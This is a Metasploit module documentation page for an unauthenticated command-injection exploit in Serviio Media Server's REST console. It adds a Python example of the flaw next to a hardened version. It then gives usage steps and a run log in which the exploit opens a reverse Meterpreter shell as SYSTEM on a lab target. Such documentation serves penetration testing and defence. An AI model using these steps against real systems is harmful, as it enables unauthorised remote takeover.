metasploit-gs/documentation/modules/exploit/windows/http/serviio_checkstreamurl_cmd_exec.md
2017-05-31 21:21:38 -04:00

Description

This module exploits an unauthenticated remote command execution vulnerability in the console component of Serviio Media Server versions 1.4 to 1.8 on Windows operating systems.

The console service (on port 23423 by default) exposes a REST API which does not require authentication.

The 'action' API endpoint does not sufficiently sanitize user-supplied data in the 'VIDEO' parameter of the 'checkStreamUrl' method. This parameter is used in a call to cmd.exe resulting in execution of arbitrary commands.
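
The flaw class described above (a request parameter concatenated into a cmd.exe command line) next to a hardened form, as an added example that is not Serviio's code or the module's code. The tool name probe_tool.exe, the function names, the allowed schemes and the sample URLs are assumptions made for illustration.

```python
# Added illustration: hypothetical names throughout, not Serviio source code.
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https", "rtsp", "mms"}  # assumption: accepted stream schemes
# Characters that can end or split an argument on a Windows command line.
REJECTED_CHARS = set("\"' \t\r\n")
MAX_URL_LENGTH = 2048  # assumption: arbitrary upper bound


def build_shell_string_vulnerable(video_url):
    """Pattern the page describes: user data pasted into a cmd.exe line.

    A double quote in video_url closes the quoted argument, and cmd.exe then
    interprets whatever follows (for example '&') as its own syntax.
    """
    return 'cmd.exe /c probe_tool.exe -i "' + video_url + '"'


def validate_stream_url(video_url):
    """Return video_url unchanged if it is an acceptable stream URL, else raise."""
    if not isinstance(video_url, str) or not 0 < len(video_url) <= MAX_URL_LENGTH:
        raise ValueError("missing or oversized URL")
    bad = sorted(c for c in set(video_url) if c in REJECTED_CHARS or ord(c) < 0x20)
    if bad:
        raise ValueError("rejected characters: %r" % bad)
    parts = urlsplit(video_url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.hostname:
        raise ValueError("unsupported scheme or missing host")
    return video_url


def build_argv_hardened(video_url):
    """Argument vector for subprocess.run(argv, shell=False).

    No cmd.exe is involved, so '&' in a query string stays literal data inside
    a single argument instead of becoming a command separator.
    """
    return ["probe_tool.exe", "-i", validate_stream_url(video_url)]
```

The validator is a second layer; the structural fix is that the hardened path never builds a command string for cmd.exe to parse.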

Vulnerable Application

Serviio is a free media server. It allows you to stream your media files (music, video or images) to renderer devices (e.g. a TV set, Bluray player, games console or mobile phone) on your connected home network.

Serviio is based on Java technology and therefore runs on most platforms, including Windows, Mac and Linux (incl. embedded systems, e.g. NAS).

This module has been tested successfully on Serviio Media Server versions 1.4.0, 1.5.0, 1.6.0 and 1.8.0 on Windows 7.

Installers:

Verification Steps

  1. Start msfconsole
  2. Do: use exploit/windows/http/serviio_checkstreamurl_cmd_exec
  3. Do: set rhost [IP]
  4. Do: run
  5. You should get a session

Scenarios

msf > use exploit/windows/http/serviio_checkstreamurl_cmd_exec 
msf exploit(serviio_checkstreamurl_cmd_exec) > set rhost 172.16.191.166
rhost => 172.16.191.166
msf exploit(serviio_checkstreamurl_cmd_exec) > check
[*] 172.16.191.166:23423 The target appears to be vulnerable.
msf exploit(serviio_checkstreamurl_cmd_exec) > set verbose true
verbose => true
msf exploit(serviio_checkstreamurl_cmd_exec) > check

[*] 172.16.191.166:23423 Serviio Media Server version 1.8
[*] 172.16.191.166:23423 The target appears to be vulnerable.
msf exploit(serviio_checkstreamurl_cmd_exec) > run

[*] Started reverse TCP handler on 172.16.191.181:4444 
[*] Serviio Media Server version 1.8
[*] Command Stager progress -   7.95% done (7999/100636 bytes)
[*] Command Stager progress -  15.90% done (15998/100636 bytes)
[*] Command Stager progress -  23.85% done (23997/100636 bytes)
[*] Command Stager progress -  31.79% done (31996/100636 bytes)
[*] Command Stager progress -  39.74% done (39995/100636 bytes)
[*] Command Stager progress -  47.69% done (47994/100636 bytes)
[*] Command Stager progress -  55.64% done (55993/100636 bytes)
[*] Command Stager progress -  63.59% done (63992/100636 bytes)
[*] Command Stager progress -  71.54% done (71991/100636 bytes)
[*] Command Stager progress -  79.48% done (79990/100636 bytes)
[*] Command Stager progress -  87.43% done (87989/100636 bytes)
[*] Command Stager progress -  95.38% done (95988/100636 bytes)
[*] Sending stage (957487 bytes) to 172.16.191.166
[*] Command Stager progress - 100.00% done (100636/100636 bytes)
[*] Meterpreter session 1 opened (172.16.191.181:4444 -> 172.16.191.166:58474) at 2017-05-05 02:49:39 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > pwd 
C:\Program Files\Serviio\bin